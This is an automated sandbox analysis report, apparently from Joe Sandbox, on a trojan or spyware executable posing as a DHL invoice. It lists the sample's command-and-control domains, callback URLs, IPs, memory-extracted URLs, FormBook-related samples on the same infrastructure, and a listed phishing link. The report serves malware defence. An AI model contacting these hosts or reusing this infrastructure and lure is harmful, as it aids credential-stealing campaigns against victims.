            http://www.jagdud.store/ohf8/?gvyXe=EtxTw6OpYVppMB&Y8i=ll5dDbshsmxjCV2Jki1rRe0WTYojaPmnmIrEqeX5AC+cgPBA3oVXvxxUo0hOqHqzs3EuIGVBpbOb4OwgMNYqD9wq62ogBAVACXMNGlc+5YxBk1nmOhOQVvg=0%Avira URL Cloudsafe
            http://www.arcare.partners/veiq/?gvyXe=EtxTw6OpYVppMB&Y8i=ZaCIZuFl7wZEptGr8oGQP+xb0A/J37Yq6QCg9bOCsWn91ieeFGXGB3UxVSoIIHFs/R2ofeQV0TveU8WhT6zXata70k2wUe2St57OOyVKg7CHUyAKXe1z7Nw=100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            funddata-x.net
            		3.33.130.190
            		truetrueunknown
            booosted.xyz
            		3.33.130.190
            		truetrueunknown
            www.bejho.net
            		64.225.91.73
            		truetrueunknown
            arcare.partners
            		3.33.130.190
            		truetrueunknown
            rtpsilva4d.click
            		67.223.117.169
            		truetrue
              		unknown
              bearableguy.net
              		3.33.130.190
              		truetrue
                		unknown
                www.gcast.video
                		98.124.224.17
                		truetrue
                  		unknown
                  s9gzg9.vip
                  		3.33.130.190
                  		truetrue
                    		unknown
                    nieuws-july202541.sbs
                    		162.0.215.33
                    		truetrue
                      		unknown
                      everyone.golf
                      		3.33.130.190
                      		truetrue
                        		unknown
                        www.extrem.tech
                        		13.248.169.48
                        		truetrue
                          		unknown
                          www.jagdud.store
                          		209.74.64.187
                          		truetrue
                            		unknown
                            bandukchi.com
                            		3.33.130.190
                            		truetrue
                              		unknown
                              ghs.googlehosted.com
                              		172.217.18.19
                              		truefalse
                                		high
                                www.s9gzg9.vip
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.booosted.xyz
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.bearableguy.net
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.oneid.ink
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.funddata-x.net
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.dagoovis.org
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.arcare.partners
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.rtpsilva4d.click
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.nieuws-july202541.sbs
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.everyone.golf
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.bandukchi.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.funddata-x.net/kgqw/?Y8i=++51ydVD2Go1KxhaP3MVo0+h3G0aMK8VVopxxXyVivx076J57lFiLJq/o16RBKp5kNk8000HSHMzLW5tY9vsaI/mDiKsTd/UPoZk72+lh+5I9xFVF6w9VAA=&gvyXe=EtxTw6OpYVppMBtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.s9gzg9.vip/5hlj/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.extrem.tech/ikn1/?gvyXe=EtxTw6OpYVppMB&Y8i=lK8QPaLm/zhKqJMYNE2sX5D70ErSQQuPCqsI86u1e/xCs+G60RywLXCNnEZxAwXF4d4PTI/6YISBOu+SCh07N1ax9JYA7qzNxjbZ37nRHq3jIobn9Z81aSM=true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.bearableguy.net/37uf/?gvyXe=EtxTw6OpYVppMB&Y8i=ZqyRn0tKBl8eeDqDLfkB30WUCggn+8okKolBQQUOnigkga9xaBFfdezim29wA1t+01108B0pmPLbZAIUtL3722PCxl5Rmd8Hzuf5Mxa3n4hY0LoX5BPpi6c=true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.bandukchi.com/d22y/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.bejho.net/zhgj/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.gcast.video/9kvp/?Y8i=irFuJh4j2fCN/xdLIJkju+0Ww/aOPRv0cSVSUNzcrQBJ8yd3G+0Gay8rhpLSBKnoinj5jjn5ajFjqPJaFJwFxtDWOxi5ujV2lXqfQRwRqrJQ238DxciUY6U=&gvyXe=EtxTw6OpYVppMBtrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.bearableguy.net/37uf/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.nieuws-july202541.sbs/0bvv/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.bejho.net/zhgj/?Y8i=JdcPiMMO58hRVijVJpirz9/V5cix6+KSp2WZxXJhOFhYalpiiMnN1LFcUFae4/RxJfLAk2h1IoFKP2Vwx+6Zjf+Qzw/S6pq9Hcy8Rpyilffl6Uu+pL95yEg=&gvyXe=EtxTw6OpYVppMBtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.gcast.video/9kvp/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.oneid.ink/wlyv/?Y8i=IuREpM7aSitXKjuhE/mFHFDVwD2eRLCYNRFeU3oJFmzodDyLIPB9Z9kG2f5hKEjWCIf9aFQVH3NuQ6OQSrT4GxlP+w8Yb3pAn7KQBwnL39T0VCYIbwJiho8=&gvyXe=EtxTw6OpYVppMBfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.funddata-x.net/kgqw/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.bandukchi.com/d22y/?Y8i=dxLCwHEd799e6zKzvZNVLcz/EcQwMQKXxfRDzHSBACKu35rXWSMWvF6m2/zFPWSnOOS4JYjJIrjoqVx5R3nGQB+J6unEzU7Qg/zyG7VApaoWeyOXFK3Agjg=&gvyXe=EtxTw6OpYVppMBtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.oneid.ink/wlyv/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.everyone.golf/8hrm/?Y8i=/8yNM9wGzpX2p7Gr9OMs8k3Lkit8nMI9nKTTJBalfkMfH6xzxaryHaqGqaSFmjBUY2ej3x2hRFvFhHVuCPrBPiINYkfJGOYYxyYlLdiiR95oU5gTTm7ij0A=&gvyXe=EtxTw6OpYVppMBtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.extrem.tech/ikn1/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.booosted.xyz/ndw1/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.rtpsilva4d.click/e61w/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.nieuws-july202541.sbs/0bvv/?gvyXe=EtxTw6OpYVppMB&Y8i=LsZlfLJLVWn36+29SrbHwZ4luzPZC8QC5ghK6sSKdTzC3J+tSarGA1FPkRmoEIfFSAMLZ+GzwFna9SDLC9K8A7K2msKq/CeIb1Pmlq+zJ/M9UWL1f9QpmJ4=true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.jagdud.store/ohf8/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.jagdud.store/ohf8/?gvyXe=EtxTw6OpYVppMB&Y8i=ll5dDbshsmxjCV2Jki1rRe0WTYojaPmnmIrEqeX5AC+cgPBA3oVXvxxUo0hOqHqzs3EuIGVBpbOb4OwgMNYqD9wq62ogBAVACXMNGlc+5YxBk1nmOhOQVvg=true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.everyone.golf/8hrm/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.arcare.partners/veiq/?gvyXe=EtxTw6OpYVppMB&Y8i=ZaCIZuFl7wZEptGr8oGQP+xb0A/J37Yq6QCg9bOCsWn91ieeFGXGB3UxVSoIIHFs/R2ofeQV0TveU8WhT6zXata70k2wUe2St57OOyVKg7CHUyAKXe1z7Nw=true
                                                      • Avira URL Cloud: malware
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabwextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/ac/?q=wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://nojs.domaincntrol.comwextract.exe, 0000000D.00000002.4141477691.00000000051E6000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.00000000034A6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icowextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://wa.me/94760523025?text=Hiwextract.exe, 0000000D.00000002.4141477691.000000000619A000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.000000000445A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://upx.sf.netAmcache.hve.7.drfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.booosted.xyzrQkTBkrqhGpTBn.exe, 0000000E.00000002.4142164546.00000000053F1000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.ecosia.org/newtab/wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ac.ecosia.org/autocomplete?q=wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://domaincntrol.com/?orighost=wextract.exe, 0000000D.00000002.4141477691.00000000051E6000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.00000000034A6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referwextract.exe, 0000000D.00000002.4141477691.000000000569C000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                162.0.215.33
                                                                                		nieuws-july202541.sbsCanada
                                                                                		35893ACPCAtrue
                                                                                64.225.91.73
                                                                                		www.bejho.netUnited States
                                                                                		14061DIGITALOCEAN-ASNUStrue
                                                                                209.74.64.187
                                                                                		www.jagdud.storeUnited States
                                                                                		31744MULTIBAND-NEWHOPEUStrue
                                                                                172.217.18.19
                                                                                		ghs.googlehosted.comUnited States
                                                                                		15169GOOGLEUSfalse
                                                                                13.248.169.48
                                                                                		www.extrem.techUnited States
                                                                                		16509AMAZON-02UStrue
                                                                                67.223.117.169
                                                                                		rtpsilva4d.clickUnited States
                                                                                		15189VIMRO-AS15189UStrue
                                                                                3.33.130.190
                                                                                		funddata-x.netUnited States
                                                                                		8987AMAZONEXPANSIONGBtrue
                                                                                98.124.224.17
                                                                                		www.gcast.videoUnited States
                                                                                		21740ENOMAS1UStrue

                                                                                General Information

                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1557059
                                                                                Start date and time:2024-11-17 08:34:08 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 10m 57s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:15
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:2
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.expl.evad.winEXE@14/11@15/8
                                                                                EGA Information:
                                                                                • Successful, ratio: 50%
                                                                                HCA Information:
                                                                                • Successful, ratio: 81%
                                                                                • Number of executed functions: 160
                                                                                • Number of non-executed functions: 264
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Execution Graph export aborted for target dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, PID 6540 because it is empty
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                02:35:04API Interceptor18x Sleep call for process: powershell.exe modified
                                                                                02:35:17API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                02:36:16API Interceptor11652165x Sleep call for process: wextract.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                162.0.215.33QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                                                • www.nieuws-july202491.sbs/4bpc/
                                                                                r0000000NT_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                • www.nieuws-july202491.sbs/rq5n/
                                                                                rInvoiceCM60916_xlx.exeGet hashmaliciousFormBookBrowse
                                                                                • www.nieuws-july202491.sbs/rq5n/
                                                                                z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                                                • www.nieuws-july202491.sbs/rq5n/
                                                                                64.225.91.738dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                • qetyhyg.com/login.php
                                                                                7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                • qetyhyg.com/login.php
                                                                                UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                • qetyhyg.com/login.php
                                                                                1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                • qetyhyg.com/login.php
                                                                                arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                • qetyhyg.com/login.php
                                                                                Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                • qetyhyg.com/login.php
                                                                                WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                • galynuh.com/login.php
                                                                                Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                • qetyhyg.com/login.php
                                                                                uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                • qetyhyg.com/login.php
                                                                                7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                • qetyhyg.com/login.php
                                                                                209.74.64.187En88bvC0fc.exeGet hashmaliciousFormBookBrowse
                                                                                • www.cotxot.info/tf3f/
                                                                                VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                                                • www.techyes.life/rirk/
                                                                                New orde.exeGet hashmaliciousFormBookBrowse
                                                                                • www.selectox.xyz/b26r/
                                                                                Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                                • www.jagdud.store/qxse/
                                                                                BL.exeGet hashmaliciousFormBookBrowse
                                                                                • www.jagdud.store/qxse/
                                                                                rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                • www.turnnex.online/dhzn/
                                                                                ROQ_972923.exeGet hashmaliciousFormBookBrowse
                                                                                • www.goldpal.xyz/ym9o/
                                                                                BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                • www.jagdud.store/qxse/
                                                                                PO59458.exeGet hashmaliciousFormBookBrowse
                                                                                • www.cotxot.info/fqdb/
                                                                                FDA.exeGet hashmaliciousFormBookBrowse
                                                                                • www.selectox.xyz/b26r/

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                www.bejho.net2ULrUoVwTx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                • 64.225.91.73
                                                                                rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                • 64.225.91.73
                                                                                www.gcast.videoPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                • 98.124.224.17
                                                                                PO-000172483 (2).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                • 98.124.224.17
                                                                                Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                • 98.124.224.17
                                                                                rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                • 98.124.224.17
                                                                                PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                                • 98.124.224.17
                                                                                Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                                                • 98.124.224.17
                                                                                PO#071024.exeGet hashmaliciousFormBookBrowse
                                                                                • 98.124.224.17
                                                                                PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                • 98.124.224.17
                                                                                CENA.exeGet hashmaliciousFormBookBrowse
                                                                                • 98.124.224.17
                                                                                NARLOG 08.10.2024.exeGet hashmaliciousFormBookBrowse
                                                                                • 98.124.224.17

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                DIGITALOCEAN-ASNUS11sds_Invoice_9334749.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                • 68.183.112.81
                                                                                FSVAUIEMDNKSA_Invoice_Pdf.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                • 68.183.112.81
                                                                                Setup.exeGet hashmaliciousUnknownBrowse
                                                                                • 167.99.235.203
                                                                                https://mail.outlook-365.com/0fslgu3q29ktmq2dGet hashmaliciousUnknownBrowse
                                                                                • 68.183.142.105
                                                                                https://www.photogallerybd.com/n/?c3Y9bzM2NV8xX29uZSZyYW5kPWMydFJkbWs9JnVpZD1VU0VSMjgxMDIwMjRVMjQxMDI4NTQ=N0123NGet hashmaliciousMamba2FABrowse
                                                                                • 165.22.49.66
                                                                                http://deepai.orgGet hashmaliciousLiteHTTP BotBrowse
                                                                                • 159.89.246.130
                                                                                RuntimeusererVers.exeGet hashmaliciousPython StealerBrowse
                                                                                • 159.89.102.253
                                                                                Hire P.O.exeGet hashmaliciousFormBookBrowse
                                                                                • 167.172.133.32
                                                                                https://0nline1.hao123com.site/?LqbtQF9CuNBmOCSgs5mGet hashmaliciousHTMLPhisherBrowse
                                                                                • 167.172.98.117
                                                                                https://google-databricks.com/?uniq_id=b92ZeoMGet hashmaliciousUnknownBrowse
                                                                                • 104.131.67.145
                                                                                MULTIBAND-NEWHOPEUSRFQ.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.64.58
                                                                                DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.64.59
                                                                                https://u47618913.ct.sendgrid.net/ls/click?upn=u001.ySazWJ5NZMDRHbOtEU-2BeoVq5CHimfeKOmAStZ-2FBgQMYQ3SSwsETAhk1yN-2BT4-2Bp2oKYzZov6D-2F-2FVWJZ1NqqUA8rkCQTGD9qAyzE3VfFeoQ2nuSJqqyEFkZOdD2fHyfAGMqPTrK5an3w0r3jeoJ-2B5P7rAm7lpee2LRBP-2FVZ8vpCC6OhMnZUP9C90hQTb0-2BpgFS16pphNEcXB1XFdv8oIx-2FwRORRrbhR98R4uG9rtcNDDwGDlWsc4rC8kZPQKm-2F1Mm8tNwYXTNsqE7C9scBPWKFj8-2Flkc4ljwpAg27SdTSH4Lv1yIeDUc-2Br14vSnR5hortDhaaXBKI0vawIBQmkU8qdJOSHyv8egzfUQvo0FmhKgqV1moo-2BnRe99IbJ35dDYZE0MrccJKFnB5BMI9ztOOsnQMWDWj4usmLc-2BeVbqm24LsVBI18WzbkH2NLJelVG2ts-2FY8NEmgO2IHd2ydt-2BhAOvQWuc-2BoCn3Ao-2FeTWrPbny4XNYysHB9Qu5AO8kwT-2BngJOg10GMOXJS1JsoXicgqZmKM-2B-2FBOfXRHNWtl98FVLgmqGL1yDRbHi-2BrUHFtCwtB3BRDatptZmQIPNmSCXkxadq8IAoDDcDLc8BntBCtxPjmUSXgMaBFfsbPygwonXOkWZIQIxp1wvHXj-2BZ1eIGRPTwfugS5VMB7jYi-2FePeZ2P8ejmUXu0aUYor7jxsavDdhhTlU0d3WGd7xXyc70gSNl4s0N8kb-2FhMFZ3OuPfAMZG-2BGWl7Vsgw97GpKKLJX78rYX8Dtq0-2BFHI8oijeDXiQEnvU-2FI4F3F63PGiFfTUlwdYZGBzmjvsDN3AL1dSwty6HpxvSAKCtZ9VWrfa8NwcaFPKhxnxW4r2AR9TTWpNatEfU14LjPxEM-2F6jXkw8omQsSQ5ERlG1h6ZTouS0rz5yiYIeyCUVpUuOT4FtnK35YgC-2B0S-2FAum0FNVEv9aFTVDigH5szZA6pWOYsjwY5forGtNE55v7VxXGbkIRiEOYPWjYX7vj5EKbcmwdWMu8O3989atXdomEpBZG0cX1ylWoweLRVGVMNbSs-2FOqs-2B2xH8pdGj9VcybpSShtsD0ZIyshNyN0TwKGcJvKUNgMPDQVU64V5WleuedIajiM6uCp0xLc8RFYl0z-2B6RGF9NRTuzleNM-2Fg7hwq-2BEg52eVJjsFh3FdZjf0sr4TFySEDrqq3wci8zEr-2FI5c5Wj-2Fk-2F98bI-2FtCrFbLhfO78CKXQ3KYT53otrRT47GTmw-3D-3DwgKy_cipWnXOVDIhOM-2BBXOyzcHeOgQULBtPxx5riDWemF2G-2BwYzp7goEAXusjqSQprai9ZAQSor3gqS04DnqVBNX-2B27UevOScScKFnEaHJjzQ16GEAAakNELZybevGcJfbhSMyz-2FBkUhDktUr20hzj2tsCmKBBmBXnfL9SKUCvI82Axz3RMcAfJhD5XZvwDkb1SgvyUaaM4lOGnGhDtzRF5NN8-2FlqjhJjS-2FU6ncYoAfO4VYI-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                • 209.74.72.93
                                                                                statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.64.58
                                                                                rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.64.59
                                                                                RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.64.58
                                                                                Selected_Items.vbsGet hashmaliciousFormBookBrowse
                                                                                • 209.74.64.59
                                                                                Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.64.58
                                                                                RFQ.docxGet hashmaliciousFormBookBrowse
                                                                                • 209.74.64.59
                                                                                AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.64.58
                                                                                ACPCAPago SEPA.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                • 162.55.60.2
                                                                                Hire P.O.exeGet hashmaliciousFormBookBrowse
                                                                                • 162.0.211.143
                                                                                Lista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                                                • 162.55.60.2
                                                                                New Order___________pdf.exeGet hashmaliciousDarkCloudBrowse
                                                                                • 162.55.60.2
                                                                                x86.elfGet hashmaliciousMiraiBrowse
                                                                                • 162.52.29.90
                                                                                http://www.skyunitedlc.comGet hashmaliciousUnknownBrowse
                                                                                • 162.0.217.112
                                                                                Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                                • 162.55.60.2
                                                                                Payment Receipt Attached PDF.exeGet hashmaliciousGuLoaderBrowse
                                                                                • 162.55.60.2
                                                                                Order.exeGet hashmaliciousFormBookBrowse
                                                                                • 162.0.211.143
                                                                                FCGF98760900.bat.exeGet hashmaliciousDarkCloudBrowse
                                                                                • 162.55.60.2
                                                                                AMAZON-02US0xh0roxxnavebusyoo.arc.elfGet hashmaliciousUnknownBrowse
                                                                                • 54.171.230.55
                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                • 18.244.18.38
                                                                                file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                • 18.244.18.122
                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                • 18.244.18.122
                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                • 18.245.113.126
                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                • 18.244.18.27
                                                                                https://www.hopp.bio/granovitasauGet hashmaliciousUnknownBrowse
                                                                                • 52.40.206.64
                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                • 18.245.124.3
                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                • 3.170.115.57
                                                                                x86.elfGet hashmaliciousUnknownBrowse
                                                                                • 52.11.211.2

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KZCLEVLDVTOMZN41_f1d48a7cf9ed22df75687aa63279f7e5e1babf71_a3f93483_4e8a0d7d-ee9a-43e0-ac8c-2a5f667a1200\Report.wer

                                                                                Download File
                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):65536
                                                                                Entropy (8bit):1.3326257413350309
                                                                                Encrypted:false
                                                                                SSDEEP:192:5TbHYzaZ0ni02KpeffxpySaWz3OlTwdNXIqzuiFcZ24lO8WE:RH7Z0p2KQn3a4ou1HzuiFcY4lO8b
                                                                                MD5:6D7CACB337FDCF8825EFC5799D63E82A
                                                                                SHA1:DFF238CA3068B3BFF0CD0E5A6464D0968B4AA27D
                                                                                SHA-256:4D24E937B79383EE02806EC80F2F2F11FAEEBEAADBD84E7C366F00C4B2B2AA3D
                                                                                SHA-512:F2CA3F4C90A0426E55553E453E02E499EED9C4971BADD22071356D232C5F4356BCA146C7021B0F77A2BE0598E78557106755D8152DBC1D6C0EC0794730B21EDF
                                                                                Malicious:false
